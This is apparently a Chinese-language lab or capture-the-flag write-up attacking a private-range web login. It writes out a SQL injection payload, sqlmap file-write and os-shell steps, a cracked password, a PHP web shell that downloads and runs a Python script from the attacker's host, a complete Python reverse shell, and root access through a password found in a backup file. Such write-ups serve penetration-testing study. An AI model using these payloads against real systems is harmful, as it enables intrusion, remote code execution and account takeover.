1 http://10.10.10.100/login.php 存在sql注入
Username: admin@isints.com' and extractvalue(1,concat(0x5c,(select database())))#
Password: x
存在注入,那么sqlmap 跑一下。 保存post数据包
C2c4b4e51d9e23c02c15702c136c3e950ba9a4af
Cmd5收费 somd5给力 密码killerbeesareflying
登录,发现还是这套,之前手工注册登录的也是这个
看来重点不在这儿,尝试sqlmap --os-shell ,发现显示成功但是命令实际并未执行且没有输出
后注意到这儿sqlmap是提供文件上传链接的,
但是尝试上传自己马反弹shell还是不行,查看phpinfo的disable_function 发现没有禁用函数,
说不清哪的问题,但是这个我在oscp中遇到过。 那么换一种方式
<?php system("cd /tmp; wget http://10.10.10.2/python_bd.py; python python_bd.py");?>
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.2",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
sqlmap写入文件
然后浏览器访问3.php ,即可发现nc收到shell了
提权:
有价值的
home目录未发现信息,尝试mysql方向
找到mysql密码
先尝试ssh连接,发现不行
本地登录也不行
最终在上一层目录发现其备份文件。。复制密码尝试su root 直接登录了。。
总结:
1 sqlmap写入文件时会提供一个上传文件的后门链接,如果sqlmap的后门文件无法使用,可使用这个链接再次上传自己的马
2 sqlmap --file-write --file-dest